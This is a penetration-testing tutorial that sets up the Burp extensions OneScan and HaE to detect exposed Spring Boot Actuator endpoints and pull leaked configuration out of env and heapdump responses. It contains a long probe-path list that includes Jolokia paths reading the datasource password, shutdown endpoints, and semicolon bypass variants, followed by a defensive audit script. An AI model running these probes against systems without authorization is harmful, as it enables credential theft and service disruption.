Preface

Below I describe the Burp Suite extensions I use when pentesting Spring Boot and the approach for finding weaknesses. The main idea is to probe for specific well-known paths in order to find leaked configuration.

Procedure

Install OneScan and HaE.
[screenshot: 2023-08-04T02:28:38.png]
Go to OneScan's Dashboard tab and turn on Listen Proxy Message.
[screenshot: 2023-08-04T02:29:10.png]
Then, in the Payload tab, click Clear and paste the following probe paths:
[screenshot: 2023-08-04T02:29:20.png]

/api/swagger.json 
/v2/swagger.json 
/api/swagger.json 
/v2/api-docs 
/api-doc 
/swagger-resources 
/druid/index.html 
/services 
/admin 
/actuator 
/api/actuator 
/APPWebService 
/v3/api-docs 
/env 
/trace 
/api/v2/api-docs 
/v2/api-docs; 
/actuator; 
/js/ueditor/ueditor.config.js 
/nacos/index.html 
/jeecg-boot/ 
/ueditor/ueditor.config.js 
/getUserInfo 
/v1/api-docs 
/OfficeServer.jsp 
/APPWebService/AppService.asmx 
/js/config.js 
/env; 
/druid/login.html 
/druid/index.html 
/druid/basic.json 
/autoconfig 
/auditevents 
/configprops 
/dump 
/env 
/env/java.home 
/features 
/health 
/heapdump 
/logfile 
/loggers 
/jolokia 
/jolokia/list 
/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.password 
/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.url 
/mappings 
/metrics/mem 
/metrics/ 
/restart 
/trace 
/actuator/druid/login.html 
/actuator/autoconfig 
/actuator/auditevents 
/actuator/configprops 
/actuator/beans 
/actuator/dump 
/actuator/env 
/actuator/env/java.home 
/actuator/features 
/actuator/health 
/actuator/heapdump 
/actuator/info 
/actuator/logfile 
/actuator/loggers 
/actuator/jolokia 
/actuator/jolokia/list 
/actuator/shutdown 
/actuator/trace 
/nacos 
;/api/swagger.json 
;/v2/swagger.json 
;/api/swagger.json 
;/v2/api-docs 
;/api-doc 
;/swagger-resources 
;/druid/index.html 
;/services 
;/actuator 
;/api/actuator 
;/APPWebService 
;/v3/api-docs 
;/env 
;/trace 
;/api/v2/api-docs 
;/v2/api-docs; 
;/actuator; 
;/js/ueditor/ueditor.config.js 
;/nacos/index.html 
;/jeecg-boot/ 
;/ueditor/ueditor.config.js 
;/getUserInfo 
;/v1/api-docs 
;/OfficeServer.jsp 
;/js/config.js 
;/env; 
;/druid/login.html 
;/druid/index.html 
;/druid/basic.json 
;/autoconfig 
;/auditevents 
;/configprops 
;/dump 
;/env 
;/env/java.home 
;/features 
;/health 
;/heapdump 
;/logfile 
;/loggers 
;/jolokia 
;/jolokia/list 
;/jolokia/exec/org.springframework

Then load HaE as well under Other.
[screenshot: 2023-08-04T02:29:43.png]
Switch to the HaE tab and add a rule under Rules.
[screenshot: 2023-08-04T02:29:50.png]
Set Regex to (\{\"\_links\"\:\{\"self), which matches the opening of an Actuator discovery response ({"_links":{"self"...), and fill in the remaining fields as shown in the screenshot above.
Then go back to Proxy, open the browser, and browse the target site.
[screenshot: 2023-08-04T02:29:56.png]
Responses that match the rule configured above are highlighted in red.
[screenshot: 2023-08-04T02:30:07.png]
Inspect the content; the most important items are env and heapdump.
[screenshot: 2023-08-04T02:30:34.png]
[screenshot: 2023-08-04T02:30:40.png]
Open the env URL and view it.
[screenshot: 2023-08-04T02:30:50.png]
Paste it into VS Code and format it.
[screenshot: 2023-08-04T02:40:08.png]
Check whether it contains any sensitive information.
For the heapdump, use JDumpSpider to inspect its contents.
[screenshot: 2023-08-04T02:31:01.png]
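As an added example (not code from the original post), here is the check behind the HaE rule and the env/heapdump triage above, written as a defender-side audit of one's own deployment: it applies the post's regex to a response body, then parses the _links object to list which endpoints are exposed and which of them should never be reachable anonymously. The sample response, the HIGH_RISK selection, and the host name app.example are constructed for this example.

```python
import json
import re

# The HaE rule from the post: an Actuator discovery (index) page always
# starts with {"_links":{"self":{... so this regex flags it in Burp.
ACTUATOR_INDEX_RE = re.compile(r'(\{\"\_links\"\:\{\"self)')

# Endpoints whose anonymous exposure leaks configuration, memory or control.
# Assumption: this selection is mine, drawn from the post's payload list.
HIGH_RISK = {"env", "heapdump", "jolokia", "shutdown", "logfile", "loggers",
             "mappings", "dump", "threaddump", "restart", "configprops",
             "trace", "httptrace", "auditevents", "beans"}


def audit_actuator_index(body: str) -> dict:
    """Classify the endpoints advertised by an Actuator index response.

    Returns {"is_actuator", "exposed", "high_risk"}: "exposed" holds endpoint
    names with templated variants (env-toMatch, health-path) folded into their
    base endpoint; "high_risk" is the subset that must not be reachable
    without authentication.
    """
    if not ACTUATOR_INDEX_RE.search(body):
        return {"is_actuator": False, "exposed": [], "high_risk": []}
    links = json.loads(body).get("_links", {})
    exposed = set()
    for name in links:
        if name == "self":
            continue
        exposed.add(name.split("-", 1)[0])  # "env-toMatch" -> "env"
    return {"is_actuator": True,
            "exposed": sorted(exposed),
            "high_risk": sorted(exposed & HIGH_RISK)}


# Constructed sample (not captured from any real host) of what an app with
# management.endpoints.web.exposure.include=* answers at /actuator.
SAMPLE_INDEX = (
    '{"_links":{"self":{"href":"http://app.example/actuator","templated":false},'
    '"health":{"href":"http://app.example/actuator/health","templated":false},'
    '"health-path":{"href":"http://app.example/actuator/health/{*path}","templated":true},'
    '"env":{"href":"http://app.example/actuator/env","templated":false},'
    '"env-toMatch":{"href":"http://app.example/actuator/env/{toMatch}","templated":true},'
    '"heapdump":{"href":"http://app.example/actuator/heapdump","templated":false}}}'
)

if __name__ == "__main__":
    print(audit_actuator_index(SAMPLE_INDEX))
```

An index whose _links list only health and info is what a deployment with management.endpoints.web.exposure.include=health,info (instead of *) returns; an empty high_risk list is the expected result for a hardened application.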

Closing notes

This mainly comes down to probing for the relevant files and then finding the corresponding leaked configuration. Links to the helper tools are placed at the relevant spots; download them yourself.

Last modification: August 4, 2023